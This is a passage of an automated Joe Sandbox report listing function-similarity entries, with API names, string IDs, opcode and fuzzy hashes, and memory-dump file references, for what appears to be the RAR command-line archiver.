                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CMT
                                                            • API String ID: 0-2756464174
                                                            • Opcode ID: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                            • Instruction ID: cf4f0187797cadf78f58ba54faca7d0772cecea6ff5ebd6b4826b095214c8a45
                                                            • Opcode Fuzzy Hash: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                            • Instruction Fuzzy Hash: 8BD11B62A0CE8285EA24FB21D4501BDE350FF497A0F944532DA6E477D5EFBCE249CB20
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D318704
                                                              • Part of subcall function 00007FF71D314E3C: GetCurrentProcess.KERNEL32(00007FF71D319CC5), ref: 00007FF71D314E69
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *?$.
                                                            • API String ID: 2518042432-3972193922
                                                            • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                            • Instruction ID: 64d5ec9cd9896f1ec7e7edbb9f5847b990ef7bc0e0c6ef843cb0355aa6a0c831
                                                            • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                            • Instruction Fuzzy Hash: 6A51D472F18E96D5EB10EFA698004ACE7A4FB44BE8B844539DE1D17B85EF3CD0498724
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                            • Instruction ID: 19ce600ae32a14c4d154e06e93f9f7dfee7abc48958476091da80b5672378542
                                                            • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                            • Instruction Fuzzy Hash: 74113D72F18A01CAE7109F75E4812AEB7B0F748758F80553ADA8D53A58DF3CC1488F10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1705453755-0
                                                            • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                            • Instruction ID: 998eabb84fae82628ac96fe2b52b5fbd409e3d139251004da068f5f9b9f3f303
                                                            • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                            • Instruction Fuzzy Hash: CE012D32A2CA8286EB70EB15E4513AAF3A1FB85754F800135E68C86588EE6CD649CF50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                            • Instruction ID: 3142ff2d175d67ee9d2f30394b1eb84a6fd6e981843c763d4d22322e54912a6a
                                                            • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                            • Instruction Fuzzy Hash: 2E419C72A09F46C9E700DF65E8417AAB7A4EB187A8F80413AEE5C07B55EE3CD029C754
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Console$Mode$Handle$Readfflush
                                                            • String ID:
                                                            • API String ID: 1039280553-0
                                                            • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                            • Instruction ID: 397d50adedeba2eff0e9c159d2914447897caa3e7637f93d46ab3e611d306917
                                                            • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                            • Instruction Fuzzy Hash: 61215635E1CA52D7EA10AB25A804579E361FB89BB1F944134EE4A07764FE3CD94ECF10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 932687459-0
                                                            • Opcode ID: bded3eb97cd522293b02a364016924ca6bbff2ef19536e48150b63450b2bece9
                                                            • Instruction ID: 749570059b40a988022a4722cc7a4f0dd25756984be34d79b13aa7e5f678f447
                                                            • Opcode Fuzzy Hash: bded3eb97cd522293b02a364016924ca6bbff2ef19536e48150b63450b2bece9
                                                            • Instruction Fuzzy Hash: AC81E432A0CE92C5EB65AA11E5403BDE350FB44BA4F984139DA4D07B99FF7CE4498B20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 233258989-2277559157
                                                            • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                            • Instruction ID: 6e2dea492649f8d6cb66f3c7c4ee51faba3fd3971c002ae33af1836a6cfab86a
                                                            • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                            • Instruction Fuzzy Hash: 0602D722B0CD8241FA24FA3195453FEE751AF497A0F840431DAAE57786EEBCE548DB21
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                            • String ID: rtmp%d
                                                            • API String ID: 2308737092-3303766350
                                                            • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                            • Instruction ID: 43f196ec62ed3cb1a073739d324273c11130bf701fa4aba3f853712ab977ada0
                                                            • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                            • Instruction Fuzzy Hash: A7519322A1CD8684EA31FF21D8511FEA351BF447A4FE40131D91D97A9AFE3CD609CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateEventHandle$ErrorLast
                                                            • String ID: rar -ioff
                                                            • API String ID: 4151682896-4089728129
                                                            • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                            • Instruction ID: d3d2b8b8c66d8a2d820132002ead9b859654fc488c4068adc90c0df426ffa07c
                                                            • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                            • Instruction Fuzzy Hash: 74018B39E1DE16C2FA14BB70E950670E362AF48722FC80838D90E426A0FE3C704C8E30
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                            • API String ID: 667068680-1824683568
                                                            • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                            • Instruction ID: 303c51452162745e4b9e625ef137164773eb4ea312260c953b5344fcb183af62
                                                            • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                            • Instruction Fuzzy Hash: 21F0F635E0DF56C1EA54AB11F954069E361AF49BE0B885438D95E06724FE3CE54DCB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: +$-
                                                            • API String ID: 3215553584-2137968064
                                                            • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                            • Instruction ID: 0af85b07cb4334079aa2860018761b4e6102b7a4ff63265d4e0702d7eff7244c
                                                            • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                            • Instruction Fuzzy Hash: 5C12C17AE0D943C5FB24BB5590856F9E295EB00774FC8433AC69A436C0FF2CA649CB24
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Backup$Read$Seek$wcschr
                                                            • String ID:
                                                            • API String ID: 2092471728-0
                                                            • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                            • Instruction ID: 58146ca3f48b9ce415dc180981c0b3805fa1d8c84df0d17dc8d2e82d36ce3918
                                                            • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                            • Instruction Fuzzy Hash: 4851563261CB8186EB20DF15E44016AF7A5FB85BA4F504235EAAD43B98EF3DD949CF10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                            • Instruction ID: 92adc0e7494241ff2dd1eab10bca433de819d5b0b94cf7d2a6391c53864484fb
                                                            • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                            • Instruction Fuzzy Hash: D5518AB2F18A51CAEB54DFB4D4401ACB7B1F708798B90403ADE1E56B58EF38D559CB10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
